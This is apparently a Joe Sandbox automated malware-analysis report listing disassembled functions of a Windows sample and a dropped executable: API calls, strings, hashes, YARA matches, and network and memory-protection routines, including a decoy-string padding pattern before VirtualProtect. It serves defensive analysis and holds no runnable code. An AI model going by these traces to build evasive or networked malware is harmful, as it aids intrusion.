Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F

Function 0043AE69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44

Strings

ACP, xrefs: 0043AE87
OCP, xrefs: 0043AEBD

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E

Function 0216B0D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0216B32B,?,00000050,?,?,?,?,?), ref: 0216B1AB

Strings

OCP, xrefs: 0216B124
ACP, xrefs: 0216B0EE

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: 36f500bd4def2a16a809523492d537b0160737166b922c7771326b6aa477282a
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: 6721A462A88105B6EB348E54AD09BBF739AEB40B5DF478064ED19F7204F732DB60C390

Function 00401F0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A

Strings

image/png, xrefs: 00401F58

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: EncodersGdipImage$Size
String ID: image/png
API String ID: 864223233-2966254431
Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58

Function 0040EF26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA

Strings

F(@, xrefs: 0040EF29

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ErrorLast
String ID: F(@
API String ID: 1452528299-2698495834
Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9

Function 0040C510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0040C554

Strings

F(@, xrefs: 0040C547
ios_base::failbit set, xrefs: 0040C510

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: F(@$ios_base::failbit set
API String ID: 4194217158-1828034088
Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC

Function 0044068A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00440691

Strings

MOC, xrefs: 004406B4
RCC, xrefs: 004406C3

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: H_prolog3_catch
String ID: MOC$RCC
API String ID: 3886170330-2084237596
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE

Function 00404E07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C

Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE

std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50

Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0

Strings

F@, xrefs: 00404E48

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: F@
API String ID: 2118720939-885931407
Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89

Function 00428D77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
__CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA

Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D

Strings

Access violation - no RTTI data!, xrefs: 00428D7A

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
String ID: Access violation - no RTTI data!
API String ID: 2053020834-2158758863
Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D

Function 0042381B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E

Strings

zB, xrefs: 00423821
~B, xrefs: 00423827

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ContextInternal$BaseBase::~Concurrency::details::
String ID: zB$~B
API String ID: 3275300208-395995950
Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC

Function 004212BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
__CxxThrowException@8.LIBVCRUNTIME ref: 004212E9

Strings

pThreadProxy, xrefs: 004212D3

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pThreadProxy
API String ID: 1687795959-3651400591
Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC

Function 004394BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 004394BD
GetCommandLineW.KERNEL32 ref: 004394C8

Strings

%\, xrefs: 004394C3

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: CommandLine
String ID: %\
API String ID: 3253501508-1847548324
Opcode ID: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
Instruction ID: a72b382a13dd36543230f851506b27d64c175e456db285366795c2c72c230a95
Opcode Fuzzy Hash: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
Instruction Fuzzy Hash: 15B0487C8003008BC7108F28AA081043AA0BA0BA0338002B5D4099233AD734A1008E08

Function 0042AE8A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
GetLastError.KERNEL32 ref: 0042AF2E
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A

Function 0215B0F1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02132AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02132AAD,00000000), ref: 0215B187
GetLastError.KERNEL32 ref: 0215B195
MultiByteToWideChar.KERNEL32(?,00000001,?,?,02132AAD,00000000), ref: 0215B1F0

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 9c3ecb0086aef467e58ab233896f4880e68e88dda1315a5ce820fb7ae6c11677
Instruction ID: cb00d9c28b70a2147b6c84d34d89b65c3e5c0571e94e52d7788d52526c518f6c
Opcode Fuzzy Hash: 9c3ecb0086aef467e58ab233896f4880e68e88dda1315a5ce820fb7ae6c11677
Instruction Fuzzy Hash: 04410730688225EFCF259F65D88476E7BA5EF41718F2541E8EC799B1A4DB309B01CB60

Analysis Process: B5F8.tmp.exePID: 4416, Parent PID: 432COMMON

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	55%
Signature Coverage:	18.3%
Total number of Nodes:	1664
Total number of Limit Nodes:	31

Executed Functions

Function 00406000 Relevance: 123.3, APIs: 68, Strings: 2, Instructions: 817stringnetworkCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0040602F
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406082
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004060B5
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004060E5
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406120
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406153
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406163

Strings

------, xrefs: 00406289, 004062B6, 0040652E, 0040661F
", xrefs: 004065C7, 004066B5

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$InternetOpen
String ID: "$------
API String ID: 2041821634-2370822465
Opcode ID: 98aa613e604a5db2daeae4e8514d52f2f53726565d8e30286c0dd60e41fea8cd
Instruction ID: 2125bc0cde9220f82915efd50208f228c039266d2a321542d2fdd7d2ceb0accf
Opcode Fuzzy Hash: 98aa613e604a5db2daeae4e8514d52f2f53726565d8e30286c0dd60e41fea8cd
Instruction Fuzzy Hash: FE525E71A006159BDB20AFB5DD89B9F77B5AF04304F15503AF905B72E1DB78DC028BA8

Function 00404B80 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00404BAF
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C02
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C35
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C65
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404CA3
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404CD6
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404CE6

Strings

------, xrefs: 00404E0C, 00404E39, 004050BB, 004051AC
", xrefs: 00405154, 00405242

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$InternetOpen
String ID: "$------
API String ID: 2041821634-2370822465
Opcode ID: 49ea093db890fc0322da265671638fee748496652ec839826222a43dfbee2ef2
Instruction ID: ee9b337c920fa440a166249251ede5a47d7364bfc35f9bc5310ef1df1bec01ed
Opcode Fuzzy Hash: 49ea093db890fc0322da265671638fee748496652ec839826222a43dfbee2ef2
Instruction Fuzzy Hash: C5526E71A006169BDB10AFA5DC49B9F7BB5AF44304F14503AF904B72A1DB78ED42CBE8

Function 00404980 Relevance: 61.4, APIs: 34, Strings: 1, Instructions: 115
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404994
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040499B
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049A2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049A9
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049B0
GetProcessHeap.KERNEL32(00000000,?), ref: 004049BB
RtlAllocateHeap.NTDLL(00000000), ref: 004049C2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049D2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049D9
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049E0
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049E7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049EE
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049F9
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A00
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A07
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A0E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A15
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A2B
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A32
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A39
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A40
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A47
strlen.MSVCRT ref: 00404A4F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A73
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A7A
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A81
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A88
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A8F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A9F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AA6
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AAD
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AB4
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404ABB
VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00404AD0

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040498F, 00404996, 0040499D, 004049A4, 004049AB, 004049CA, 004049D4, 004049DB, 004049E2, 004049E9, 004049F0, 004049FB, 00404A02, 00404A09, 00404A10, 00404A26, 00404A2D, 00404A34, 00404A3B, 00404A42, 00404A63, 00404A75, 00404A7C, 00404A83, 00404A8A, 00404A9A, 00404AA1, 00404AA8, 00404AAF, 00404AB6

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
